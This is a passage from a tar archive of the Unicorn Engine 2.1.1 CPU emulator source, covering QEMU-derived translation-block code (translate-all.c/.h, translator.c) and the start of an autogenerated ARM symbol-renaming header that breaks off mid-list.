tb_invalidate_phys_page_fast(struct uc_struct *uc, struct page_collection *pages, tb_page_addr_t start, int len, uintptr_t retaddr) { PageDesc *p; assert_memory_lock(); p = page_find(uc, start >> TARGET_PAGE_BITS); if (!p) { return; } assert_page_locked(p); if (!p->code_bitmap && ++p->code_write_count >= SMC_BITMAP_USE_THRESHOLD) { build_page_bitmap(uc, p); } if (p->code_bitmap) { unsigned int nr; unsigned long b; nr = start & ~TARGET_PAGE_MASK; b = p->code_bitmap[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG - 1)); if (b & ((1 << len) - 1)) { goto do_invalidate; } } else { do_invalidate: tb_invalidate_phys_page_range__locked(uc, pages, p, start, start + len, retaddr); } } /* user-mode: call with mmap_lock held */ void tb_check_watchpoint(CPUState *cpu, uintptr_t retaddr) { TCGContext *tcg_ctx = cpu->uc->tcg_ctx; TranslationBlock *tb; assert_memory_lock(); tb = tcg_tb_lookup(tcg_ctx, retaddr); if (tb) { /* We can use retranslation to find the PC. */ cpu_restore_state_from_tb(cpu, tb, retaddr, true); tb_phys_invalidate(tcg_ctx, tb, -1); } else { /* The exception probably happened in a helper. The CPU state should have been saved before calling it. Fetch the PC from there. */ CPUArchState *env = cpu->env_ptr; target_ulong pc, cs_base; tb_page_addr_t addr; uint32_t flags; cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags); addr = get_page_addr_code(env, pc); if (addr != -1) { tb_invalidate_phys_range(cpu->uc, addr, addr + 1); } } } /* in deterministic execution mode, instructions doing device I/Os * must be at the end of the TB. * * Called by softmmu_template.h, with iothread mutex not held. */ void cpu_io_recompile(CPUState *cpu, uintptr_t retaddr) { TCGContext *tcg_ctx = cpu->uc->tcg_ctx; #if defined(TARGET_MIPS) || defined(TARGET_SH4) CPUArchState *env = cpu->env_ptr; #endif TranslationBlock *tb; uint32_t n; tb = tcg_tb_lookup(tcg_ctx, retaddr); if (!tb) { cpu_abort(cpu, "cpu_io_recompile: could not find TB for pc=%p", (void *)retaddr); } cpu_restore_state_from_tb(cpu, tb, retaddr, true); /* On MIPS and SH, delay slot instructions can only be restarted if they were already the first instruction in the TB. If this is not the first instruction in a TB then re-execute the preceding branch. */ n = 1; #if defined(TARGET_MIPS) if ((env->hflags & MIPS_HFLAG_BMASK) != 0 && env->active_tc.PC != tb->pc) { env->active_tc.PC -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4); cpu_neg(cpu)->icount_decr.u16.low++; env->hflags &= ~MIPS_HFLAG_BMASK; n = 2; } #elif defined(TARGET_SH4) if ((env->flags & ((DELAY_SLOT | DELAY_SLOT_CONDITIONAL))) != 0 && env->pc != tb->pc) { env->pc -= 2; cpu_neg(cpu)->icount_decr.u16.low++; env->flags &= ~(DELAY_SLOT | DELAY_SLOT_CONDITIONAL); n = 2; } #endif /* Generate a new TB executing the I/O insn. */ cpu->cflags_next_tb = curr_cflags() | CF_LAST_IO | n; if (tb_cflags(tb) & CF_NOCACHE) { if (tb->orig_tb) { /* Invalidate original TB if this TB was generated in * cpu_exec_nocache() */ tb_phys_invalidate(tcg_ctx, tb->orig_tb, -1); } tcg_tb_remove(tcg_ctx, tb); } /* TODO: If env->pc != tb->pc (i.e. the faulting instruction was not * the first in the TB) then we end up generating a whole new TB and * repeating the fault, which is horribly inefficient. * Better would be to execute just this insn uncached, or generate a * second new TB. */ cpu_loop_exit_noexc(cpu); } static void tb_jmp_cache_clear_page(CPUState *cpu, target_ulong page_addr) { unsigned int i, i0 = tb_jmp_cache_hash_page(cpu->uc, page_addr); for (i = 0; i < TB_JMP_PAGE_SIZE; i++) { cpu->tb_jmp_cache[i0 + i] = NULL; } } void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif /* Discard jump cache entries for any tb which might potentially overlap the flushed page. */ tb_jmp_cache_clear_page(cpu, addr - TARGET_PAGE_SIZE); tb_jmp_cache_clear_page(cpu, addr); } /* This is a wrapper for common code that can not use CONFIG_SOFTMMU */ void tcg_flush_softmmu_tlb(struct uc_struct *uc) { tlb_flush(uc->cpu); } #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__)) static bool tb_exec_is_locked(struct uc_struct *uc) { return uc->current_executable; } static void tb_exec_change(struct uc_struct *uc, bool executable) { assert(uc->current_executable == thread_executable()); if (uc->current_executable != executable) { jit_write_protect(executable); uc->current_executable = executable; assert( executable == thread_executable() ); } } #else /* not needed on non-Darwin platforms */ static bool tb_exec_is_locked(struct uc_struct *uc) { return false; } static void tb_exec_change(struct uc_struct *uc, bool locked) {} #endif void tb_exec_lock(struct uc_struct *uc) { /* assumes sys_icache_invalidate already called */ tb_exec_change(uc, true); } void tb_exec_unlock(struct uc_struct *uc) { tb_exec_change(uc, false); } ��������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/translate-all.h��������������������������������������������������������0000664�0000000�0000000�00000003012�14675241067�0020707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Translated block handling * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TRANSLATE_ALL_H #define TRANSLATE_ALL_H #include "exec/exec-all.h" /* translate-all.c */ struct page_collection *page_collection_lock(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end); void page_collection_unlock(struct page_collection *set); void tb_invalidate_phys_page_fast(struct uc_struct *uc, struct page_collection *pages, tb_page_addr_t start, int len, uintptr_t retaddr); void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end); void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start, ram_addr_t end); void tb_check_watchpoint(CPUState *cpu, uintptr_t retaddr); #endif /* TRANSLATE_ALL_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/translator.c�����������������������������������������������������������0000664�0000000�0000000�00000013316�14675241067�0020340�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic intermediate code generation. * * Copyright (C) 2016-2017 Lluís Vilanova <vilanova@ac.upc.edu> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "exec/exec-all.h" #include "exec/gen-icount.h" #include "exec/translator.h" #include <uc_priv.h> /* Pairs with tcg_clear_temp_count. To be called by #TranslatorOps.{translate_insn,tb_stop} if (1) the target is sufficiently clean to support reporting, (2) as and when all temporaries are known to be consumed. For most targets, (2) is at the end of translate_insn. */ void translator_loop_temp_check(DisasContextBase *db) { #if 0 if (tcg_check_temp_count()) { qemu_log("warning: TCG temporary leaks before " TARGET_FMT_lx "\n", db->pc_next); } #endif } void translator_loop(const TranslatorOps *ops, DisasContextBase *db, CPUState *cpu, TranslationBlock *tb, int max_insns) { int bp_insn = 0; struct uc_struct *uc = (struct uc_struct *)cpu->uc; TCGContext *tcg_ctx = uc->tcg_ctx; TCGOp *prev_op = NULL; bool block_hook = false; /* Initialize DisasContext */ db->tb = tb; db->pc_first = tb->pc; db->pc_next = db->pc_first; db->is_jmp = DISAS_NEXT; db->num_insns = 0; db->max_insns = max_insns; db->singlestep_enabled = cpu->singlestep_enabled; ops->init_disas_context(db, cpu); tcg_debug_assert(db->is_jmp == DISAS_NEXT); /* no early exit */ /* Reset the temp count so that we can identify leaks */ tcg_clear_temp_count(); /* Unicorn: early check to see if the address of this block is * the "run until" address. */ if (uc_addr_is_exit(uc, tb->pc)) { // This should catch that instruction is at the end // and generate appropriate halting code. gen_tb_start(tcg_ctx, db->tb); ops->tb_start(db, cpu); db->num_insns++; ops->insn_start(db, cpu); ops->translate_insn(db, cpu); goto _end_loop; } /* Unicorn: trace this block on request * Only hook this block if it is not broken from previous translation due to * full translation cache */ if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_BLOCK, tb->pc)) { prev_op = tcg_last_op(tcg_ctx); block_hook = true; gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, uc, db->pc_first); } // tcg_dump_ops(tcg_ctx, false, "translator loop"); /* Start translating. */ gen_tb_start(tcg_ctx, db->tb); // tcg_dump_ops(tcg_ctx, false, "tb start"); ops->tb_start(db, cpu); // tcg_dump_ops(tcg_ctx, false, "tb start 2"); tcg_debug_assert(db->is_jmp == DISAS_NEXT); /* no early exit */ while (true) { db->num_insns++; ops->insn_start(db, cpu); tcg_debug_assert(db->is_jmp == DISAS_NEXT); /* no early exit */ /* Pass breakpoint hits to target for further processing */ if (!db->singlestep_enabled && unlikely(!QTAILQ_EMPTY(&cpu->breakpoints))) { CPUBreakpoint *bp; QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { if (bp->pc == db->pc_next) { if (ops->breakpoint_check(db, cpu, bp)) { bp_insn = 1; break; } } } /* The breakpoint_check hook may use DISAS_TOO_MANY to indicate that only one more instruction is to be executed. Otherwise it should use DISAS_NORETURN when generating an exception, but may use a DISAS_TARGET_* value for Something Else. */ if (db->is_jmp > DISAS_TOO_MANY) { break; } } /* Disassemble one instruction. The translate_insn hook should update db->pc_next and db->is_jmp to indicate what should be done next -- either exiting this loop or locate the start of the next instruction. */ ops->translate_insn(db, cpu); // tcg_dump_ops(tcg_ctx, false, "insn translate"); /* Stop translation if translate_insn so indicated. */ if (db->is_jmp != DISAS_NEXT) { break; } /* Stop translation if the output buffer is full, or we have executed all of the allowed instructions. */ if (tcg_op_buf_full(tcg_ctx) || db->num_insns >= db->max_insns) { db->is_jmp = DISAS_TOO_MANY; break; } } _end_loop: /* Emit code to exit the TB, as indicated by db->is_jmp. */ ops->tb_stop(db, cpu); gen_tb_end(tcg_ctx, db->tb, db->num_insns - bp_insn); // tcg_dump_ops(tcg_ctx, false, "tb end"); /* The disas_log hook may use these values rather than recompute. */ db->tb->size = db->pc_next - db->pc_first; db->tb->icount = db->num_insns; hooked_regions_check(uc, db->tb->pc, db->tb->size); if (block_hook) { TCGOp *tcg_op; // Unicorn: patch the callback to have the proper block size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this basic block is the first emulated code ever, // so the basic block operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = db->tb->size; } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/arm.h����������������������������������������������������������������������������0000664�0000000�0000000�00000317260�14675241067�0015114�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_arm_H #define UNICORN_AUTOGEN_arm_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _arm #endif #define unicorn_fill_tlb unicorn_fill_tlb_arm #define reg_read reg_read_arm #define reg_write reg_write_arm #define uc_init uc_init_arm #define uc_add_inline_hook uc_add_inline_hook_arm #define uc_del_inline_hook uc_del_inline_hook_arm #define tb_invalidate_phys_range tb_invalidate_phys_range_arm #define use_idiv_instructions use_idiv_instructions_arm #define arm_arch arm_arch_arm #define tb_target_set_jmp_target tb_target_set_jmp_target_arm #define have_bmi1 have_bmi1_arm #define have_popcnt have_popcnt_arm #define have_avx1 have_avx1_arm #define have_avx2 have_avx2_arm #define have_isa have_isa_arm #define have_altivec have_altivec_arm #define have_vsx have_vsx_arm #define flush_icache_range flush_icache_range_arm #define s390_facilities s390_facilities_arm #define tcg_dump_op tcg_dump_op_arm #define tcg_dump_ops tcg_dump_ops_arm #define tcg_gen_and_i64 tcg_gen_and_i64_arm #define tcg_gen_discard_i64 tcg_gen_discard_i64_arm #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_arm #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_arm #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_arm #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_arm #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_arm #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_arm #define tcg_gen_ld_i64 tcg_gen_ld_i64_arm #define tcg_gen_mov_i64 tcg_gen_mov_i64_arm #define tcg_gen_movi_i64 tcg_gen_movi_i64_arm #define tcg_gen_mul_i64 tcg_gen_mul_i64_arm #define tcg_gen_or_i64 tcg_gen_or_i64_arm #define tcg_gen_sar_i64 tcg_gen_sar_i64_arm #define tcg_gen_shl_i64 tcg_gen_shl_i64_arm #define tcg_gen_shr_i64 tcg_gen_shr_i64_arm #define tcg_gen_st_i64 tcg_gen_st_i64_arm #define tcg_gen_xor_i64 tcg_gen_xor_i64_arm #define cpu_icount_to_ns cpu_icount_to_ns_arm #define cpu_is_stopped cpu_is_stopped_arm #define cpu_get_ticks cpu_get_ticks_arm #define cpu_get_clock cpu_get_clock_arm #define cpu_resume cpu_resume_arm #define qemu_init_vcpu qemu_init_vcpu_arm #define cpu_stop_current cpu_stop_current_arm #define resume_all_vcpus resume_all_vcpus_arm #define vm_start vm_start_arm #define address_space_dispatch_compact address_space_dispatch_compact_arm #define flatview_translate flatview_translate_arm #define address_space_translate_for_iotlb address_space_translate_for_iotlb_arm #define qemu_get_cpu qemu_get_cpu_arm #define cpu_address_space_init cpu_address_space_init_arm #define cpu_get_address_space cpu_get_address_space_arm #define cpu_exec_unrealizefn cpu_exec_unrealizefn_arm #define cpu_exec_initfn cpu_exec_initfn_arm #define cpu_exec_realizefn cpu_exec_realizefn_arm #define tb_invalidate_phys_addr tb_invalidate_phys_addr_arm #define cpu_watchpoint_insert cpu_watchpoint_insert_arm #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_arm #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_arm #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_arm #define cpu_breakpoint_insert cpu_breakpoint_insert_arm #define cpu_breakpoint_remove cpu_breakpoint_remove_arm #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_arm #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_arm #define cpu_abort cpu_abort_arm #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_arm #define memory_region_section_get_iotlb memory_region_section_get_iotlb_arm #define flatview_add_to_dispatch flatview_add_to_dispatch_arm #define qemu_ram_get_host_addr qemu_ram_get_host_addr_arm #define qemu_ram_get_offset qemu_ram_get_offset_arm #define qemu_ram_get_used_length qemu_ram_get_used_length_arm #define qemu_ram_is_shared qemu_ram_is_shared_arm #define qemu_ram_pagesize qemu_ram_pagesize_arm #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_arm #define qemu_ram_alloc qemu_ram_alloc_arm #define qemu_ram_free qemu_ram_free_arm #define qemu_map_ram_ptr qemu_map_ram_ptr_arm #define qemu_ram_block_host_offset qemu_ram_block_host_offset_arm #define qemu_ram_block_from_host qemu_ram_block_from_host_arm #define qemu_ram_addr_from_host qemu_ram_addr_from_host_arm #define cpu_check_watchpoint cpu_check_watchpoint_arm #define iotlb_to_section iotlb_to_section_arm #define address_space_dispatch_new address_space_dispatch_new_arm #define address_space_dispatch_free address_space_dispatch_free_arm #define flatview_read_continue flatview_read_continue_arm #define address_space_read_full address_space_read_full_arm #define address_space_write address_space_write_arm #define address_space_rw address_space_rw_arm #define cpu_physical_memory_rw cpu_physical_memory_rw_arm #define address_space_write_rom address_space_write_rom_arm #define cpu_flush_icache_range cpu_flush_icache_range_arm #define cpu_exec_init_all cpu_exec_init_all_arm #define address_space_access_valid address_space_access_valid_arm #define address_space_map address_space_map_arm #define address_space_unmap address_space_unmap_arm #define cpu_physical_memory_map cpu_physical_memory_map_arm #define cpu_physical_memory_unmap cpu_physical_memory_unmap_arm #define cpu_memory_rw_debug cpu_memory_rw_debug_arm #define qemu_target_page_size qemu_target_page_size_arm #define qemu_target_page_bits qemu_target_page_bits_arm #define qemu_target_page_bits_min qemu_target_page_bits_min_arm #define target_words_bigendian target_words_bigendian_arm #define cpu_physical_memory_is_io cpu_physical_memory_is_io_arm #define ram_block_discard_range ram_block_discard_range_arm #define ramblock_is_pmem ramblock_is_pmem_arm #define page_size_init page_size_init_arm #define set_preferred_target_page_bits set_preferred_target_page_bits_arm #define finalize_target_page_bits finalize_target_page_bits_arm #define cpu_outb cpu_outb_arm #define cpu_outw cpu_outw_arm #define cpu_outl cpu_outl_arm #define cpu_inb cpu_inb_arm #define cpu_inw cpu_inw_arm #define cpu_inl cpu_inl_arm #define memory_map memory_map_arm #define memory_map_io memory_map_io_arm #define memory_map_ptr memory_map_ptr_arm #define memory_cow memory_cow_arm #define memory_unmap memory_unmap_arm #define memory_moveout memory_moveout_arm #define memory_movein memory_movein_arm #define memory_free memory_free_arm #define flatview_unref flatview_unref_arm #define address_space_get_flatview address_space_get_flatview_arm #define memory_region_transaction_begin memory_region_transaction_begin_arm #define memory_region_transaction_commit memory_region_transaction_commit_arm #define memory_region_init memory_region_init_arm #define memory_region_access_valid memory_region_access_valid_arm #define memory_region_dispatch_read memory_region_dispatch_read_arm #define memory_region_dispatch_write memory_region_dispatch_write_arm #define memory_region_init_io memory_region_init_io_arm #define memory_region_init_ram_ptr memory_region_init_ram_ptr_arm #define memory_region_size memory_region_size_arm #define memory_region_set_readonly memory_region_set_readonly_arm #define memory_region_get_ram_ptr memory_region_get_ram_ptr_arm #define memory_region_from_host memory_region_from_host_arm #define memory_region_get_ram_addr memory_region_get_ram_addr_arm #define memory_region_add_subregion memory_region_add_subregion_arm #define memory_region_del_subregion memory_region_del_subregion_arm #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_arm #define memory_region_find memory_region_find_arm #define memory_region_filter_subregions memory_region_filter_subregions_arm #define memory_listener_register memory_listener_register_arm #define memory_listener_unregister memory_listener_unregister_arm #define address_space_remove_listeners address_space_remove_listeners_arm #define address_space_init address_space_init_arm #define address_space_destroy address_space_destroy_arm #define memory_region_init_ram memory_region_init_ram_arm #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_arm #define find_memory_mapping find_memory_mapping_arm #define exec_inline_op exec_inline_op_arm #define floatx80_default_nan floatx80_default_nan_arm #define float_raise float_raise_arm #define float16_is_quiet_nan float16_is_quiet_nan_arm #define float16_is_signaling_nan float16_is_signaling_nan_arm #define float32_is_quiet_nan float32_is_quiet_nan_arm #define float32_is_signaling_nan float32_is_signaling_nan_arm #define float64_is_quiet_nan float64_is_quiet_nan_arm #define float64_is_signaling_nan float64_is_signaling_nan_arm #define floatx80_is_quiet_nan floatx80_is_quiet_nan_arm #define floatx80_is_signaling_nan floatx80_is_signaling_nan_arm #define floatx80_silence_nan floatx80_silence_nan_arm #define propagateFloatx80NaN propagateFloatx80NaN_arm #define float128_is_quiet_nan float128_is_quiet_nan_arm #define float128_is_signaling_nan float128_is_signaling_nan_arm #define float128_silence_nan float128_silence_nan_arm #define float16_add float16_add_arm #define float16_sub float16_sub_arm #define float32_add float32_add_arm #define float32_sub float32_sub_arm #define float64_add float64_add_arm #define float64_sub float64_sub_arm #define float16_mul float16_mul_arm #define float32_mul float32_mul_arm #define float64_mul float64_mul_arm #define float16_muladd float16_muladd_arm #define float32_muladd float32_muladd_arm #define float64_muladd float64_muladd_arm #define float16_div float16_div_arm #define float32_div float32_div_arm #define float64_div float64_div_arm #define float16_to_float32 float16_to_float32_arm #define float16_to_float64 float16_to_float64_arm #define float32_to_float16 float32_to_float16_arm #define float32_to_float64 float32_to_float64_arm #define float64_to_float16 float64_to_float16_arm #define float64_to_float32 float64_to_float32_arm #define float16_round_to_int float16_round_to_int_arm #define float32_round_to_int float32_round_to_int_arm #define float64_round_to_int float64_round_to_int_arm #define float16_to_int16_scalbn float16_to_int16_scalbn_arm #define float16_to_int32_scalbn float16_to_int32_scalbn_arm #define float16_to_int64_scalbn float16_to_int64_scalbn_arm #define float32_to_int16_scalbn float32_to_int16_scalbn_arm #define float32_to_int32_scalbn float32_to_int32_scalbn_arm #define float32_to_int64_scalbn float32_to_int64_scalbn_arm #define float64_to_int16_scalbn float64_to_int16_scalbn_arm #define float64_to_int32_scalbn float64_to_int32_scalbn_arm #define float64_to_int64_scalbn float64_to_int64_scalbn_arm #define float16_to_int16 float16_to_int16_arm #define float16_to_int32 float16_to_int32_arm #define float16_to_int64 float16_to_int64_arm #define float32_to_int16 float32_to_int16_arm #define float32_to_int32 float32_to_int32_arm #define float32_to_int64 float32_to_int64_arm #define float64_to_int16 float64_to_int16_arm #define float64_to_int32 float64_to_int32_arm #define float64_to_int64 float64_to_int64_arm #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_arm #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_arm #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_arm #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_arm #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_arm #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_arm #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_arm #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_arm #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_arm #define float16_to_uint16_scalbn float16_to_uint16_scalbn_arm #define float16_to_uint32_scalbn float16_to_uint32_scalbn_arm #define float16_to_uint64_scalbn float16_to_uint64_scalbn_arm #define float32_to_uint16_scalbn float32_to_uint16_scalbn_arm #define float32_to_uint32_scalbn float32_to_uint32_scalbn_arm #define float32_to_uint64_scalbn float32_to_uint64_scalbn_arm #define float64_to_uint16_scalbn float64_to_uint16_scalbn_arm #define float64_to_uint32_scalbn float64_to_uint32_scalbn_arm #define float64_to_uint64_scalbn float64_to_uint64_scalbn_arm #define float16_to_uint16 float16_to_uint16_arm #define float16_to_uint32 float16_to_uint32_arm #define float16_to_uint64 float16_to_uint64_arm #define float32_to_uint16 float32_to_uint16_arm #define float32_to_uint32 float32_to_uint32_arm #define float32_to_uint64 float32_to_uint64_arm #define float64_to_uint16 float64_to_uint16_arm #define float64_to_uint32 float64_to_uint32_arm #define float64_to_uint64 float64_to_uint64_arm #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_arm #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_arm #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_arm #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_arm #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_arm #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_arm #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_arm #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_arm #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_arm #define int64_to_float16_scalbn int64_to_float16_scalbn_arm #define int32_to_float16_scalbn int32_to_float16_scalbn_arm #define int16_to_float16_scalbn int16_to_float16_scalbn_arm #define int64_to_float16 int64_to_float16_arm #define int32_to_float16 int32_to_float16_arm #define int16_to_float16 int16_to_float16_arm #define int64_to_float32_scalbn int64_to_float32_scalbn_arm #define int32_to_float32_scalbn int32_to_float32_scalbn_arm #define int16_to_float32_scalbn int16_to_float32_scalbn_arm #define int64_to_float32 int64_to_float32_arm #define int32_to_float32 int32_to_float32_arm #define int16_to_float32 int16_to_float32_arm #define int64_to_float64_scalbn int64_to_float64_scalbn_arm #define int32_to_float64_scalbn int32_to_float64_scalbn_arm #define int16_to_float64_scalbn int16_to_float64_scalbn_arm #define int64_to_float64 int64_to_float64_arm #define int32_to_float64 int32_to_float64_arm #define int16_to_float64 int16_to_float64_arm #define uint64_to_float16_scalbn uint64_to_float16_scalbn_arm #define uint32_to_float16_scalbn uint32_to_float16_scalbn_arm #define uint16_to_float16_scalbn uint16_to_float16_scalbn_arm #define uint64_to_float16 uint64_to_float16_arm #define uint32_to_float16 uint32_to_float16_arm #define uint16_to_float16 uint16_to_float16_arm #define uint64_to_float32_scalbn uint64_to_float32_scalbn_arm #define uint32_to_float32_scalbn uint32_to_float32_scalbn_arm #define uint16_to_float32_scalbn uint16_to_float32_scalbn_arm #define uint64_to_float32 uint64_to_float32_arm #define uint32_to_float32 uint32_to_float32_arm #define uint16_to_float32 uint16_to_float32_arm #define uint64_to_float64_scalbn uint64_to_float64_scalbn_arm #define uint32_to_float64_scalbn uint32_to_float64_scalbn_arm #define uint16_to_float64_scalbn uint16_to_float64_scalbn_arm #define uint64_to_float64 uint64_to_float64_arm #define uint32_to_float64 uint32_to_float64_arm #define uint16_to_float64 uint16_to_float64_arm #define float16_min float16_min_arm #define float16_minnum float16_minnum_arm #define float16_minnummag float16_minnummag_arm #define float16_max float16_max_arm #define float16_maxnum float16_maxnum_arm #define float16_maxnummag float16_maxnummag_arm #define float32_min float32_min_arm #define float32_minnum float32_minnum_arm #define float32_minnummag float32_minnummag_arm #define float32_max float32_max_arm #define float32_maxnum float32_maxnum_arm #define float32_maxnummag float32_maxnummag_arm #define float64_min float64_min_arm #define float64_minnum float64_minnum_arm #define float64_minnummag float64_minnummag_arm #define float64_max float64_max_arm #define float64_maxnum float64_maxnum_arm #define float64_maxnummag float64_maxnummag_arm #define float16_compare float16_compare_arm #define float16_compare_quiet float16_compare_quiet_arm #define float32_compare float32_compare_arm #define float32_compare_quiet float32_compare_quiet_arm #define float64_compare float64_compare_arm #define float64_compare_quiet float64_compare_quiet_arm #define float16_scalbn float16_scalbn_arm #define float32_scalbn float32_scalbn_arm #define float64_scalbn float64_scalbn_arm #define float16_sqrt float16_sqrt_arm #define float32_sqrt float32_sqrt_arm #define float64_sqrt float64_sqrt_arm #define float16_default_nan float16_default_nan_arm #define float32_default_nan float32_default_nan_arm #define float64_default_nan float64_default_nan_arm #define float128_default_nan float128_default_nan_arm #define float16_silence_nan float16_silence_nan_arm #define float32_silence_nan float32_silence_nan_arm #define float64_silence_nan float64_silence_nan_arm #define float16_squash_input_denormal float16_squash_input_denormal_arm #define float32_squash_input_denormal float32_squash_input_denormal_arm #define float64_squash_input_denormal float64_squash_input_denormal_arm #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_arm #define roundAndPackFloatx80 roundAndPackFloatx80_arm #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_arm #define int32_to_floatx80 int32_to_floatx80_arm #define int32_to_float128 int32_to_float128_arm #define int64_to_floatx80 int64_to_floatx80_arm #define int64_to_float128 int64_to_float128_arm #define uint64_to_float128 uint64_to_float128_arm #define float32_to_floatx80 float32_to_floatx80_arm #define float32_to_float128 float32_to_float128_arm #define float32_rem float32_rem_arm #define float32_exp2 float32_exp2_arm #define float32_log2 float32_log2_arm #define float32_eq float32_eq_arm #define float32_le float32_le_arm #define float32_lt float32_lt_arm #define float32_unordered float32_unordered_arm #define float32_eq_quiet float32_eq_quiet_arm #define float32_le_quiet float32_le_quiet_arm #define float32_lt_quiet float32_lt_quiet_arm #define float32_unordered_quiet float32_unordered_quiet_arm #define float64_to_floatx80 float64_to_floatx80_arm #define float64_to_float128 float64_to_float128_arm #define float64_rem float64_rem_arm #define float64_log2 float64_log2_arm #define float64_eq float64_eq_arm #define float64_le float64_le_arm #define float64_lt float64_lt_arm #define float64_unordered float64_unordered_arm #define float64_eq_quiet float64_eq_quiet_arm #define float64_le_quiet float64_le_quiet_arm #define float64_lt_quiet float64_lt_quiet_arm #define float64_unordered_quiet float64_unordered_quiet_arm #define floatx80_to_int32 floatx80_to_int32_arm #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_arm #define floatx80_to_int64 floatx80_to_int64_arm #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_arm #define floatx80_to_float32 floatx80_to_float32_arm #define floatx80_to_float64 floatx80_to_float64_arm #define floatx80_to_float128 floatx80_to_float128_arm #define floatx80_round floatx80_round_arm #define floatx80_round_to_int floatx80_round_to_int_arm #define floatx80_add floatx80_add_arm #define floatx80_sub floatx80_sub_arm #define floatx80_mul floatx80_mul_arm #define floatx80_div floatx80_div_arm #define floatx80_rem floatx80_rem_arm #define floatx80_sqrt floatx80_sqrt_arm #define floatx80_eq floatx80_eq_arm #define floatx80_le floatx80_le_arm #define floatx80_lt floatx80_lt_arm #define floatx80_unordered floatx80_unordered_arm #define floatx80_eq_quiet floatx80_eq_quiet_arm #define floatx80_le_quiet floatx80_le_quiet_arm #define floatx80_lt_quiet floatx80_lt_quiet_arm #define floatx80_unordered_quiet floatx80_unordered_quiet_arm #define float128_to_int32 float128_to_int32_arm #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_arm #define float128_to_int64 float128_to_int64_arm #define float128_to_int64_round_to_zero 